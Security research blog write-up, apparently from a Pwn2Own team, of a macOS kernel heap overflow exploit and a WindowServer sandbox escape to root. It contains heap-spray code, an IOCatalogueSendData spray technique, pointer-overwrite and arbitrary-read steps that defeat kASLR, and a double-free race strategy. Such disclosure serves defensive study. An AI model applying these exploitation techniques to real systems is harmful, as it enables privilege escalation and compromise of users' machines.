When the overflow occurs, the memory layout is shown as the following figure.

As the figure shows, the add function is called on a partially out-of-bounds 48-byte block. The size field is fixed to 0xdeadbeefdeadbeef: because kalloc.48 is smaller than the cache-line size, the block is always poisoned after being freed. The good news is that both the capacity and the storage pointer are under our control. This means we have a write-anywhere primitive covering the whole address space, by carefully preparing content satisfying the following equation, let

then

and also

However, this write-anywhere primitive is not a write-anything primitive. The rectangles initially have their fields in signed int16 format, falling in the range [-0x8000, 0x7fff]. By the time the function is called, they have already been transformed into their IEEE 754 representation in memory, which implies we can only use it to write two contiguous 4-byte values of the form 0x3…, 0x4…, 0xc…, 0xd… or 0xbf800000 (0xbf800000 is the float representation of -1), four times, corrupting 32 bytes of memory.
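The value restriction is easy to see by looking at the bit patterns directly. The C sketch below converts an int16 to a single-precision float and returns its raw bits. It assumes a plain cast, whereas the driver applies further multiplications and divisions first, so it only shows the shape of the values; float_bits and int16_as_float_bits are illustrative names.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Returns the raw IEEE 754 single-precision bit pattern of f. */
uint32_t float_bits(float f)
{
    uint32_t bits;
    assert(sizeof(float) == sizeof(uint32_t));
    memcpy(&bits, &f, sizeof bits);
    return bits;
}

/* Bit pattern that ends up in memory when an int16 field becomes a float. */
uint32_t int16_as_float_bits(int16_t v)
{
    return float_bits((float)v);
}
```

For instance, -1 becomes 0xbf800000, 1 becomes 0x3f800000, 0x7fff becomes 0x46fffe00 and -0x8000 becomes 0xc7000000, so the top nibble of a written value is pinned by the sign and exponent of the float rather than chosen freely.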

Control the kalloc.48 zone

We need to place precisely controlled values right after the overflowed vector, otherwise the kernel will crash on a bad access. Unfortunately, kalloc.48 is a zone used frequently in the kernel, with IOMachPort being the most commonly seen object, and we must get rid of it. Previous work mainly relies on io_open_service_extended and ool_msg to prepare the kernel heap, but both cause problems in our situation:

ool_msg has a small heap side effect, but its first 0x18 bytes are not controllable, while we need precise control of 8 bytes at offset 0x8
io_open_service_extended has a massive side effect in the kalloc.48 zone, producing an IOMachPort for every opened spraying connection
each io_open_service_extended call can pass at most 37 items into the kernel to occupy space, a limit set by the maximum number of properties an IOServiceConnection can hold

Thus we’re presenting a new spray technique: IOCatalogueSendData shown in following code snippet. Only one master_port is needed for continuously spraying, really energy-saving and earth friendly :)

IOCatalogueSendData(
        mach_port_t     _masterPort,
        uint32_t                flag,
        const char             *buffer,
        uint32_t                size )
{
//...

    kr = io_catalog_send_data( masterPort, flag,
                            (char *) buffer, size, &result );
//...
    if ((masterPort != MACH_PORT_NULL) && (masterPort != _masterPort))
    mach_port_deallocate(mach_task_self(), masterPort);
//...
}

/* Routine io_catalog_send_data */
kern_return_t is_io_catalog_send_data(
        mach_port_t     master_port,
        uint32_t                flag,
        io_buf_ptr_t        inData,
        mach_msg_type_number_t  inDataCount,
        kern_return_t *     result)
{
//...
    if (inData) {
//...
        kr = vm_map_copyout( kernel_map, &map_data, (vm_map_copy_t)inData);
        data = CAST_DOWN(vm_offset_t, map_data);
     // must return success after vm_map_copyout() succeeds
        if( inDataCount ) {
            obj = (OSObject *)OSUnserializeXML((const char *)data, inDataCount);
//...
    switch ( flag ) {
//...

        case kIOCatalogAddDrivers: 
        case kIOCatalogAddDriversNoMatch: {
//...
                array = OSDynamicCast(OSArray, obj);
                if ( array ) {
                    if ( !gIOCatalogue->addDrivers( array , 
                                          flag == kIOCatalogAddDrivers) ) {
//...
            }
            break;
//...
}

bool IOCatalogue::addDrivers(
    OSArray * drivers,
    bool doNubMatching)
{
   //...
    while ( (object = iter->getNextObject()) ) {
    
        // xxx Deleted OSBundleModuleDemand check; will handle in other ways for SL

        OSDictionary * personality = OSDynamicCast(OSDictionary, object);
//...
        // Add driver personality to catalogue.
    OSArray * array = arrayForPersonality(personality);
    if (!array) addPersonality(personality);
    else
    {       
        count = array->getCount();
        while (count--) {
        OSDictionary * driver;
        
        // Be sure not to double up on personalities.
        driver = (OSDictionary *)array->getObject(count);
//...
        if (personality->isEqualTo(driver)) {
            break;
        }
        }
        if (count >= 0) {
        // its a dup
        continue;
        }
        result = array->setObject(personality);
//...
    set->setObject(personality);        
    }
//...
}

The addDrivers function accepts an OSArray under the following easy-to-meet conditions:

The OSArray contains an OSDict
The OSDict has the key IOProviderClass
The OSDict must not be exactly the same as any OSDict that already exists in the catalogue

We can place our sprayed content in the array part, as the following sample XML shows, and slightly change one char per spray to satisfy condition 3. OSString accepts all bytes except the null byte, which can also be avoided. The spray proceeds by calling IOCatalogueSendData(masterPort, 2, buf, 4096) as many times as we wish.


    
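<array>
    <dict>
        <key>IOProviderClass</key>
        <string>ZZZZ</string>
        <key>ZZZZ</key>
        <array>
            <string>AAAAAAAAAAAAAAAAAAAAAA</string>
            <string>AAAAAAAAAAAAAAAAAAAAAB</string>
            ...
            <string>ZZZZZZZZZZZZZZZZZZZZZZ</string>
        </array>
    </dict>
</array>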
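Generating one such buffer per spray could look like the C sketch below. It assumes the sample above is an array holding one dict with an IOProviderClass key and an array of 22-character strings, and it varies eight characters per spray (a hex counter) rather than one, simply to keep every dictionary distinct. build_spray_xml is a hypothetical helper; the actual IOCatalogueSendData call is deliberately left out.

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>

/* Writes one spray document into buf; returns buf, or NULL if it does not fit. */
char *build_spray_xml(char *buf, size_t cap, unsigned spray_index)
{
    assert(buf != NULL && cap > 0);
    /* The %08x counter makes each dictionary differ from earlier ones,
       which is what condition 3 requires. */
    int n = snprintf(buf, cap,
        "<array><dict>"
        "<key>IOProviderClass</key><string>ZZZZ</string>"
        "<key>ZZZZ</key><array>"
        "<string>AAAAAAAAAAAAAA%08x</string>"
        "<string>AAAAAAAAAAAAAAAAAAAAAB</string>"
        "</array></dict></array>",
        spray_index);
    return (n > 0 && (size_t)n < cap) ? buf : NULL;
}
```

A spray loop would call this with an increasing index and pass each resulting buffer to IOCatalogueSendData as described above.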

So we take the following steps in kalloc.48 to achieve a stable write-anywhere:

Spray many combinations of 1 ool_msg and 50 IOCatalogueSendData allocations (the content of which is totally controllable), both of size 0x30, pushing allocations into a contiguous region.
Free the ool_msgs in the 1/3 to 2/3 part, leaving holes in the allocation as shown below.
Trigger the vulnerable function; the vulnerable allocation will fall into a hole we previously left, as shown below.

With nearly 100% probability the heap will be laid out as in the previous figure, which exactly matches what we expected. Spraying 50 or more controllable 0x30-sized allocations in one roll reduces the chance that irrelevant 0x30-sized content produced by other kernel activity, such as IOMachPort, accidentally lands right after the free block. It also enables us to do a double-write or triple-write, which we found crucial in the following exploitation steps.

Write a float to control RIP

Now that the write itself is stable, we move on to turning the write into actual RIP control and/or an infoleak. The first idea that comes to mind is to overwrite a vtable pointer at the head of some userclient. At first glance this vulnerability is not a very good write primitive for that, because we will certainly corrupt the poor userclient, as shown in the following figure:

In the OS X kernel, it is almost impossible (or you can just say impossible) for addresses whose high byte is 0xbf to be occupied or prepared with content. But due to the nature of Blitzard, we are also unable to adjust the value we write so that it starts with 0xffffff80 and points to a heap location we control.

But thanks to Intel CPUs, we can make a qword write at an unaligned location, i.e. at a 4-byte offset.

This looks reasonable, but we found the stability is not promising. In the huge family of userclients, it seems only RootDomainUserClient has a virtual table pointer whose high bytes are 0xffffff80. All the other userclients have vtable pointers whose 4th byte is 0x7f. Address space starting at 0xffffff7f00000000 is usually occupied by non-writable sections, so it is not possible to manipulate memory there to gain any degree of memory control, while address space whose high bytes are 0xffffff80 may well contain heap regions.

Decreasing spray speed? Why?

But RootDomainUserClient is a small userclient, and we need to spray lots of them to have a good chance that a RootDomainUserClient falls at the beginning of a particular page. However, we quickly found that the spray speed drops noticeably as the number of userclients increases. After some investigation we found the root cause of this issue; check the following code snippet.

bool IORegistryEntry::attachToParent( IORegistryEntry * parent,
                                const IORegistryPlane * plane )
{
    OSArray *   links;
    bool        ret;
    bool        needParent;
//...
    ret = makeLink( parent, kParentSetIndex, plane );

    if( (links = parent->getChildSetReference( plane )))
        needParent = (false == arrayMember( links, this ));
    else
        needParent = true;

//...
    if( needParent)
        ret &= parent->attachToChild( this, plane );

    return( ret );

Here arrayMember performs a linear search over the already attached clients, which already implies O(N^2) time complexity for N attachments.
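The quadratic cost can be seen by counting comparisons in a toy model. The C sketch below attaches n distinct children one by one, scanning the existing links before each insertion the way an arrayMember-style check would. It is a simplified stand-in for the registry code, with a made-up function name and a fixed capacity.

```c
#include <assert.h>
#include <stddef.h>

#define MAX_CHILDREN 4096u

/* Attaches n distinct children and returns the number of comparisons made. */
size_t attach_all(size_t n)
{
    static int links[MAX_CHILDREN];
    size_t count = 0, comparisons = 0;

    assert(n <= MAX_CHILDREN);
    for (size_t id = 0; id < n; id++) {
        int found = 0;
        for (size_t i = 0; i < count; i++) {  /* linear membership scan */
            comparisons++;
            if (links[i] == (int)id) {
                found = 1;
                break;
            }
        }
        if (!found)
            links[count++] = (int)id;         /* new child: append it */
    }
    return comparisons;                       /* n * (n - 1) / 2 for new ids */
}
```

Doubling the number of attached userclients roughly quadruples the work: 1000 attachments cost 499500 comparisons and 2000 cost 1999000.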

Can things be worse? Let’s go further. When userclients are opened, they need to be attached to their parent. This will in turn call parent->attachToChild

bool IORegistryEntry::attachToChild( IORegistryEntry * child,
                                        const IORegistryPlane * plane )
{
    OSArray *   links;
//...

    ret = makeLink( child, kChildSetIndex, plane );

then

bool IORegistryEntry::makeLink( IORegistryEntry * to,
                                unsigned int relation,
                                const IORegistryPlane * plane ) const
{
    OSArray *   links;
    bool        result = false;
//...
        result = arrayMember( links, to );
        if( !result)
            result = links->setObject( to );

    } else {

links is an OSArray, and setObject inserts the new userclient into the array storage, which calls into this expensive function:

unsigned int OSArray::ensureCapacity(unsigned int newCapacity)
{
//...
    newArray = (const OSMetaClassBase **) kalloc_container(newSize);
    if (newArray) {
        oldSize = sizeof(const OSMetaClassBase *) * capacity;

        OSCONTAINER_ACCUMSIZE(((size_t)newSize) - ((size_t)oldSize));

        bcopy(array, newArray, oldSize);
        bzero(&newArray[capacity], newSize - oldSize);
        kfree(array, oldSize);
        array = newArray;

In conclusion, the spraying time grows as N^2 with the number of opened userclients per service. This may not be a big problem for powerful MacBook Pros, but we found the Core M processor in the new MacBook (which is unfortunately the machine we need to exploit in the Pwn2Own competition) to be as slow as grandma, which forced us to find better and faster ways.
Fortunately, a new method popped up and solved the RIP control and info leak problems in one shot. That’s perfect.

IGAccelVideoContext comes to the rescue

As we search for helpful userclients, the following criteria must be met:

It must be reachable from sandbox
Size of userclient must be larger than PAGE_SIZE, and bigger is better (faster spray speed)

We have to admit that directly overwriting vtable pointers is not a good solution for our vulnerability. Can we overwrite some pointer fields of a userclient instead? The answer is yes. IGAccelVideoContext is a perfect candidate, with size 0x2000. Nearly all IOAcceleratorFamily2 userclients have an associated service pointer, which points to the mother IntelAccelerator. In the following figure we can see this pointer at offset 0x528. It is a heap location, which means we can use the previously mentioned so-called slide-writing to overwrite only the lower 4 bytes and make it point to heap memory we control.
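The slide-writing idea can be modelled in user space. The following C sketch assumes a little-endian machine and a made-up original pointer value; write_two_dwords stands in for the two adjacent 4-byte values the bug writes, and all function names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Emulates the primitive: two consecutive 32-bit values written at dst. */
void write_two_dwords(unsigned char *dst, uint32_t first, uint32_t second)
{
    memcpy(dst, &first, sizeof first);
    memcpy(dst + 4, &second, sizeof second);
}

/* Starts the write 4 bytes before the pointer field, so only its low dword
   changes (little-endian). The 4 bytes before the field are clobbered too. */
uint64_t slide_write(unsigned char *obj, size_t field_off, uint32_t low)
{
    uint64_t ptr;
    assert(field_off >= 4);
    write_two_dwords(obj + field_off - 4, low, low);
    memcpy(&ptr, obj + field_off, sizeof ptr);
    return ptr;
}

/* Fake 0x2000-byte object with a service pointer at offset 0x528. */
uint64_t demo_service_after_write(void)
{
    static unsigned char obj[0x2000];
    const uint64_t service = 0xffffff8012345678ull; /* made-up heap pointer */

    memset(obj, 0, sizeof obj);
    memcpy(obj + 0x528, &service, sizeof service);
    return slide_write(obj, 0x528, 0xbf800000u);
}
```

In this model the pointer keeps its 0xffffff80 high half and becomes 0xffffff80bf800000, at the cost of clobbering the 4 bytes in front of the field.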

RIP control

Further study reveals that there are virtual function calls on this pointer. But we need to take extra caution, as we cannot directly call the fake service’s virtual function, because the header of vm_map_copy is not controllable. So we take another approach, as we found that the context_finish function makes an indirect call on service->mEventMachine:

__int64 __fastcall IOAccelContext2::context_finish(IOAccelContext2 *this)
{
  int v1; // eax@1
  unsigned int v2; // ecx@1

  v1 = this->service->mEventMachine->vt->__ZN24IOAccelEventMachineFast219finishEventUnlockedEP12IOAccelEvent(
         this->service->mEventMachine,

We now adjust our goal to overwriting the service field of any IGAccelVideoContext. Given no knowledge of heap addresses, we again need to spray lots of userclients to achieve our goal. After trial and error we finally settled on the following steps:

Spray 0x50,000 ool_msgs, pushing the heap to cover 0xffffff80 bf800000 (B) with controlled content (ool)
Free the middle part of the ool_msgs and fill it with IGAccelVideoContext, covering 0xffffff80 62388000 (A)
Perform the write at A - 4 + 0x528, descending, changing the service pointer to 0xffffff80 bf800000 (B)
Call each IGAccelVideoContext’s externalMethod and detect corruption

Why do we choose the particular addresses A and B? As recalled in previous paragraphs, we can only write floats in particular ranges to the expected location, which means we can change a pointer like 0xffffff80 deadbeef to 0xffffff80 3xxxxxxx, 0xffffff80 4xxxxxxx, 0xffffff80 cxxxxxxx, 0xffffff80 dxxxxxxx or 0xffffff80 bf800000. Most of these addresses are either too low (kASLR changes on each boot, and a high kASLR value may shift the heap location very high, flooding 0xffffff80 4xxxxxxx) or too high (needing lots of spray time to reach). So we choose to write 0xbf800000 to the pointer, and taking roughly half of B leads to A.

This code snippet shows how to do the previous mentioned steps:

mach_msg_size_t size = 0x2000;
mach_port_name_t my_port[0x500];
memset(my_port, 0, 0x500 * sizeof(mach_port_name_t));
char *buf = malloc(size);
memset(buf, 0x41, size);
*(unsigned long *)(buf - 0x18 + 0x1230) = 0xffffff8062388000 - 0xd0 + 2;
*(unsigned long *)(buf - 0x18 + 0x230) = 0xffffff8062388000 - 0xd0 + 2;

for (int i = 0; i < 0x500; i++) {
    *(unsigned int *)buf = i;
    printf("number %x success with %x.\n",i , send_msg(buf, size, &my_port[i]));
}
for (int i = 0x130; i < 0x250; i++)
{
    read_kern_data(my_port[i]);
}
printf("press enter to fill in IOSurface2.\n");
io_service_t serv = open_service("IOAccelerator");
io_connect_t *deviceConn2;
deviceConn2 = malloc(0x12000 * sizeof(io_connect_t));
kern_return_t kernResult;
for (int i =0; i < 0x12000; i ++)
{
    kernResult = IOServiceOpen(serv, mach_task_self(), 0x100, &deviceConn2[i]);
    printf("%x with result %x.\n", i , kernResult);
}

This figure should make it clearer.

Head or middle?

Smart readers may have noticed a critical problem. Given that the size of the userclient is 0x2000, how can you be sure that the head of the userclient falls right at A? Why can’t A fall in the middle of the IGAccelVideoContext?

Yes, you’re right. It’s a 50-50 chance. If A falls in the middle of the userclient, overwriting A - 4 + 0x528 will corrupt nothing meaningful, leading to failure of the exploitation. Can we let this happen? Absolutely not. We need to trigger the write twice, to write at both A - 4 + 0x528 and A - 4 + 0x528 + 0x1000.

So you can now understand why I mentioned earlier that we may need to do a double-write in kalloc.48. By changing the value of the sprayed content in IOCatalogueSendData in an odd-even style, and triggering the vulnerability multiple times, we can ensure that there’s a nearly 100% chance that both locations will be overwritten.
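The reason two writes are enough can be checked with a little arithmetic. The sketch below is only a model: it assumes the 0x2000-byte objects are packed back to back, and the names write_target and lands_on_field are hypothetical. The offsets are the ones quoted above.

```c
#include <stdbool.h>
#include <stdint.h>

#define OBJ_SIZE     0x2000ULL /* userclient size quoted in the text */
#define HALF_SIZE    0x1000ULL /* half of one object */
#define WRITE_OFFSET 0x528ULL  /* offset used in the text */

/* Address hit by the first (which == 0) or second (which == 1) write. */
static uint64_t write_target(uint64_t a, int which)
{
    return a - 4 + WRITE_OFFSET + (which ? HALF_SIZE : 0);
}

/* True if addr sits at (WRITE_OFFSET - 4) inside some object, assuming
 * objects are packed back to back starting at first_head <= addr. */
static bool lands_on_field(uint64_t addr, uint64_t first_head)
{
    return (addr - first_head) % OBJ_SIZE == WRITE_OFFSET - 4;
}
```

If an object starts at A, the first write lands on the intended field. If A is in the middle of an object, the next object starts at A + 0x1000 and the second write lands on its field instead, so one of the two always hits.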

Bypassing kASLR

We know Steve Jobs (or Tim Cook?) will not make our life so easy, as we still have a big obstacle to overcome: the Royal kASLR, even though we have already figured out a way to control RIP. But where there’s a will, there is a way.
Let’s revisit what we have. We have a known address A covered with IGAccelVideoContext, and a known address B covered with vm_map_copy content that we control; we can also change that content as we wish, just by freeing and refilling the ool_msgs. Is there any function of some userclient that will return the content at a specified address, given that we now control the whole body of the fake userclient?

With a bit of luck, the externalMethod function get_hw_steppings caught our attention.

__int64 __fastcall IGAccelVideoContext::get_hw_steppings(IGAccelVideoContext *a1, _DWORD *a2)
{
  __int64 service; // rax@1

  service = a1->service;
  *a2 = *(_DWORD *)(service + 0x1140);
  a2[1] = *(_DWORD *)(service + 0x1144);
  a2[2] = *(_DWORD *)(service + 0x1148);
  a2[3] = *(_DWORD *)(service + 0x114C);
  a2[4] = *(unsigned __int8 *)(*(_QWORD *)(service + 0x1288) + 0xD0LL);
  return 0LL;
}

Eureka!

a2[4] = *(unsigned __int8 *)(*(_QWORD *)(service + 0x1288) + 0xD0LL);

Given that service + 0x1288 is controlled by us, this is a perfect way to return the value at an arbitrary address. Although only one byte is returned, it’s not a big deal because we can free and refill the ool_msgs as many times as we wish and read one byte at a time. We now come up with these steps.

By spraying, we can ensure that an IGAccelVideoContext lies at 0xf… 62388000 (A) and a vm_map_copy of size 0x2000 lies at 0xf… bf800000 (B).
Overwrite the service pointer with B, so it points to the controlled vm_map_copy filled with 0x4141414141414141 (except at offset 0x1288, which is set to A - 0xD0).
Test for 0x41414141 by calling get_hw_steppings on the sprayed userclients.
If it matches, we have the index of the corrupted userclient, and a2[4] returns a byte at A!
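Reading one byte per call is enough to recover whole pointers. The sketch below shows only the assembly step. The callback type read_byte_fn stands in for one free, refill and get_hw_steppings round trip, and fake_read_byte is a purely local stand-in used to exercise the logic; both are hypothetical names, not the real primitive.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical one-byte read primitive: returns the byte at addr. */
typedef uint8_t (*read_byte_fn)(uint64_t addr, void *ctx);

/* Assemble a little-endian 64-bit value from eight one-byte reads. */
static uint64_t read_u64(read_byte_fn read_byte, void *ctx, uint64_t addr)
{
    uint64_t value = 0;
    for (int i = 0; i < 8; i++)
        value |= (uint64_t)read_byte(addr + (uint64_t)i, ctx) << (8 * i);
    return value;
}

/* Local stand-in for target memory, used only to test read_u64. */
struct fake_memory {
    uint64_t base;        /* address that bytes[0] pretends to live at */
    const uint8_t *bytes;
    size_t len;
};

static uint8_t fake_read_byte(uint64_t addr, void *ctx)
{
    const struct fake_memory *m = ctx;
    uint64_t off = addr - m->base;
    return off < m->len ? m->bytes[off] : 0;
}
```

In the real setting each call to the primitive is slow, so a vtable pointer costs eight refill rounds.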
The following figure should make this clearer:

Head or middle, again

Smart readers will again have noticed that we are currently assuming A falls at the beginning of an IGAccelVideoContext. Also, nobody guarantees that B falls right at the beginning of the 0x2000-sized vm_map_copy. It’s also a 50-50 chance.

For the latter, we take the same approach. When we are preparing the ool_msg, we set both 0x1288 and 0x288 to A - 0xD0. For the former problem it’s a bit more complicated.

We observed that at offset 0x1000 of a normal IGAccelVideoContext the values are zero. This gives us a way to distinguish the two situations, given that we can now read out the content at address A. We can use an additional read to determine whether the object starts at A or at A+0x1000. If we try A but the object actually starts at A+0x1000, we will read the byte at +0x1000 of the preceding IGAccelVideoContext, which is 0; then we can try again with A+0x1000 to read the correct value.
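The trial-and-error step can be sketched as follows. This is a model under two stated assumptions: the first 8 bytes of an object (its vtable pointer) are never all zero, and the bytes at offset 0x1000 are zero, as observed above. The names leak_byte_fn, locate_head and fake_leak are hypothetical.

```c
#include <stdint.h>

#define OBJ_SIZE  0x2000ULL /* object size quoted in the text */
#define HALF_SIZE 0x1000ULL

/* Hypothetical one-byte leak primitive. */
typedef uint8_t (*leak_byte_fn)(uint64_t addr, void *ctx);

/* Read eight bytes through the primitive, little-endian. */
static uint64_t leak_u64(leak_byte_fn leak, void *ctx, uint64_t addr)
{
    uint64_t v = 0;
    for (int i = 0; i < 8; i++)
        v |= (uint64_t)leak(addr + (uint64_t)i, ctx) << (8 * i);
    return v;
}

/* Try A first; a zero qword means A is mid-object, so use A + 0x1000. */
static uint64_t locate_head(leak_byte_fn leak, void *ctx, uint64_t a)
{
    if (leak_u64(leak, ctx, a) != 0)
        return a;
    return a + HALF_SIZE;
}

/* Local stand-in: heads carry non-zero bytes, everything else is zero. */
struct fake_layout { uint64_t first_head; };

static uint8_t fake_leak(uint64_t addr, void *ctx)
{
    const struct fake_layout *l = ctx;
    uint64_t off = (addr - l->first_head) % OBJ_SIZE;
    return off < 8 ? 0x41 : 0;
}
```

Checking a full qword rather than a single byte is a choice made for this sketch; the text only describes reading a byte.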

These two figures may give you a clearer picture of this trial-and-error approach.

Wrap it up

Leak an arbitrary address, leak the vtable pointer, prepare your gadgets, ahh. I’m a bit tired, hmm, so if you are curious about what the blitzard vulnerability itself actually is, don’t miss our talk at Mandalay Bay GH on August 3 at 11:30, Black Hat USA. Hope to see you there :)

Also, it’s a pity the vulnerability was not selected for the Pwnie nominations; we will come up with a better one next year :)

Here is the video, some spraying time is omitted:

WindowServer: The privilege chameleon on macOS (Part 2)

2016-07-28T05:06:30.000Z

In my last blog post, “WindowServer: The privilege chameleon on macOS (Part 1)”, we discussed some basic concepts, the history and architecture of WindowServer, as well as the details of CVE-2016-1804, a use-after-free (or we can also call it a double free) bug with a very small time window. Several problems still exist before we can write the exploit code for this bug; now let’s resolve them one by one.

0x9 Sandbox not defined == Cannot open?

Since the Free and Use primitives reside in a single MIG call, it is not possible to fill in controlled data between the two frees from that call. Also, all CoreGraphics server APIs run in a single-threaded server loop, so we cannot use other CoreGraphics APIs to control the freed memory content. The only possible way is to leverage QuartzCore APIs, which run on another thread. QuartzCore is also known as CoreAnimation. Compared with CoreGraphics, the QuartzCore framework provides more complex graphics operations, such as animation when multiple layers are involved. Unlike CoreGraphics, the QuartzCore service is not explicitly defined in the application’s sandbox.

Does it mean we cannot open the port of the QuartzCore service? With the traditional approach we cannot, as it is blocked by the sandbox. But let’s review the last blog post: did we miss some key part?

Yes. Remember that we have three different types of complex message: OOL descriptor message, port descriptor message, and OOL port descriptor message. A port descriptor is needed when we cannot create a mach port in our own process and have to use IPC to make the server process create the port and send it back to our process. This is quite similar to the DuplicateHandle API on the Windows platform. Thus, we assumed there exists a server interface in the CoreGraphics API that can help create the service port of com.apple.CARenderServer. By auditing the code, we finally found the right one: __XCreateLayerContext:

0xA QuartzCore: the hidden interface, and new territory

The QuartzCore service is not explicitly allowed to be opened in the application sandbox, and by code auditing we found there is no sandbox consideration in any of its service interfaces. For example, the _XSetMessageFile interface allows a sandboxed application to set the log file path and file name. In other words, a sandboxed application can create any file under any path with the windowserver user’s privilege. Although the windowserver privilege is quite limited, this still deviates from the original sandbox’s privilege scope. On iOS the impact is higher because the backboardd process runs as the mobile user, which means you can create any file under any path where the mobile user can create files.

__int64 __fastcall _XSetMessageFile(__int64 a1, __int64 a2)
{
  if ( memchr((const void *)(a1 + 40), 0, v5) ) // a1 + 40 is user controllable, which is the file path
  {
    LOBYTE(v6) = CASSetMessageFile(*(unsigned int *)(a1 + 12),
                                   (const char *)(a1 + 40)); // will create the file whose path and filename can be specified by user
    *(_DWORD *)(a2 + 32) = v6;
  }
  else
  {
LABEL_14:
    *(_DWORD *)(a2 + 32) = -304;
  }
  result = *(_QWORD *)NDR_record_ptr;
  *(_QWORD *)(a2 + 24) = *(_QWORD *)NDR_record_ptr;
  return result;
}

But this bug is not critical in our case. By calling __XCreateLayerContext, we at least found a way to control another thread, which gave us some hope of exploiting CVE-2016-1804.

0xB Crash on failure?

In a race condition case, the key factor for exploitability is whether losing the race will result in a panic or process crash, especially when the racing time window is small. At first glance, it is normal for a process to crash on a double free of the same memory block. Consider the following code:

char * buf = NULL;
buf = malloc(0x60);
memset(buf , 0x41, 0x60);
free(buf);
free(buf);

When running on OS X, it results in a process crash:

checkCFData(878,0x7fff79c57000) malloc: *** error for object 0x7fe9ba40f000: pointer being freed was not allocated
*** set a breakpoint in malloc_error_break to debug
[1]    878 abort

Now let’s try the CFRelease case:

CFDataRef data = CFDataCreateWithBytesNoCopy(kCFAllocatorDefault, buf, 0x60, kCFAllocatorNull);
CFRelease(data);
CFRelease(data); //No crash will happen

Surprisingly, there is no crash! That is good news for this bug. It means we can try triggering this bug many times until we succeed. Here is the strategy to fill in controlled data between the two CFRelease calls:

0xC Race to fill in the controlled data

The next problem is: which API in QuartzCore should be chosen to fill in the freed CFData struct? This is still a challenge because:

CFData is 0x30 in size, so we need an object whose size is also 0x30 to fill it in.
The API should not generate much noise (a lot of irrelevant 0x30 objects may cause a higher failure rate).
The API should have a high rate of filling in the slot (preferably a loop that allocates objects again and again).
The first 8 bytes of the 0x30 object must be controllable (so we can confuse the method table of CFData).
This part is the key to the whole exploitation process, and I would like to discuss it in detail next week at Black Hat USA.

After finding a good API candidate to fill in, we got a stable crash at a controlled address:

0xD HeapSpray

Heap spraying is always an interesting problem in a 64-bit process. On OS X, for small-block heap allocation, a randomized heap base is involved. Consider the following code:

buf = malloc(0x60);
printf("addr is %p.\n", buf);

By running the code several times, the results are:

addr is 0x7fd1e8c0f000.
addr is 0x7fb720c0f000.
addr is 0x7f8b2a40f000.

We can see that the 5th byte of the address varies between different processes, which means you need to spray more than 1TB of memory to achieve reliable heap spraying. However, for large blocks of memory (larger than 0x20000), the randomization is not that good:

buf = malloc(0x20000);
printf("addr is %p.\n", buf);

The addresses are like this:

addr is 0x10d2ed000.
addr is 0x104ff7000.
addr is 0x10eb68000.

The higher 4 bytes are always 1, and addresses are allocated from lower to higher. By allocating a lot of 0x20000 blocks we can make sure some fixed addresses are filled with our desired data. The next question is: how can we do heap spraying in the WindowServer process? There are a lot of interfaces within CoreGraphics, and we need to find those which meet the following criteria:
– The interface accepts an OOL message
– The interface allocates user-controllable memory and does not free it immediately
We finally picked the interface _XSetConnectionProperty. We can specify different key/value pairs and set them in the connection-based dictionary, where the memory will be kept within the WindowServer process.

void __fastcall CGXSetConnectionProperty(int a1, __int64 a2, __int64 a3)
{
  ...
  v3 = a3;
  if ( !a2 )
    return;
  if ( a1 )
  {
    v5 = CGXConnectionForConnectionID();
    v6 = v5;
    if ( !v5 )
      return;
    v7 = *(_QWORD *)(v5 + 160); // get the connection based dictionary, if not exist, create it.
    if ( !v7 )
    {
      v7 = CFDictionaryCreateMutable(0LL, 0LL,
                                     kCFTypeDictionaryKeyCallBacks_ptr,
                                     kCFTypeDictionaryValueCallBacks_ptr);
      *(_QWORD *)(v6 + 160) = v7;
    }
    if ( v3 )
      CFDictionarySetValue(v7, a2, v3);
  ...
}
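The property that makes this interface useful is simply that the server keeps every value alive. A minimal, portable sketch of that idea is shown below: it allocates 0x20000-byte blocks, fills them with a pattern and retains the pointers so nothing is freed. It does not talk to WindowServer at all; struct spray, spray_fill and spray_release are hypothetical names, and the resulting addresses depend entirely on the allocator in use.

```c
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

#define BLOCK_SIZE 0x20000u /* large-block size quoted in the text */

/* Retained blocks, playing the role of the per-connection dictionary. */
struct spray {
    unsigned char **blocks;
    size_t count;
};

/* Allocate n pattern-filled blocks and keep them alive.
 * Returns 0 on success, -1 if an allocation fails. */
static int spray_fill(struct spray *s, size_t n, unsigned char pattern)
{
    s->count = 0;
    s->blocks = calloc(n ? n : 1, sizeof *s->blocks);
    if (!s->blocks)
        return -1;
    for (size_t i = 0; i < n; i++) {
        unsigned char *b = malloc(BLOCK_SIZE);
        if (!b)
            return -1;
        memset(b, pattern, BLOCK_SIZE);
        s->blocks[s->count++] = b; /* retained, never freed here */
    }
    return 0;
}

/* Free everything that spray_fill retained. */
static void spray_release(struct spray *s)
{
    for (size_t i = 0; i < s->count; i++)
        free(s->blocks[i]);
    free(s->blocks);
    s->blocks = NULL;
    s->count = 0;
}
```

In the real attack the retention happens inside the server process, which is why an interface that stores rather than consumes its input is required.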

0xE ASLR/DEP/Code Execution

ASLR is not a problem in our case, as we pwn the Safari browser first and the base addresses of most Apple frameworks are the same among different processes. DEP can also be bypassed with ROP. Code execution is not a big deal; refer to the Phrack article.

0xF Hey Chameleon, Now I want you to be ROOT!

As we know, we successfully bypassed the Apple sandbox to get the current user’s context by exploiting CVE-2014-1314. And by finding the hidden interface, we obtained new territory and found a bug which allows writing arbitrary files under _windowserver’s context.
How about CVE-2016-1804? As we got arbitrary code execution within the WindowServer process, why not try calling setuid(0) and see what happens?
The result is amazing: we successfully get root!!

root  560 0.0 0.7  2614800  33888   ??  SXs   4:30AM   0:00.04 /System/Library/Frameworks/ApplicationServices.framework/Frameworks/CoreGraphics.framework/Resources/WindowServer -daemon

Why? We know that WindowServer has a session management feature and needs to fork a new login process under the user’s context, so it must have setuid privilege. But how is it implemented?

Actually, when the WindowServer process is first spawned by the launchd daemon, it runs as root, inheriting its parent process’s uid.

(lldb) chenliangs-Mac:~ chenliang$ sudo lldb
(lldb) process attach --name WindowServer  --waitfor
Process 910 stopped
* thread #1: tid = 0x5cda, 0x00007fff6314d302 dyld`stat64 + 10, stop reason = signal SIGSTOP
    frame #0: 0x00007fff6314d302 dyld`stat64 + 10
dyld`stat64:
->  0x7fff6314d302 <+10>: jae    0x7fff6314d30c            ; <+20>
    0x7fff6314d304 <+12>: mov    rdi, rax
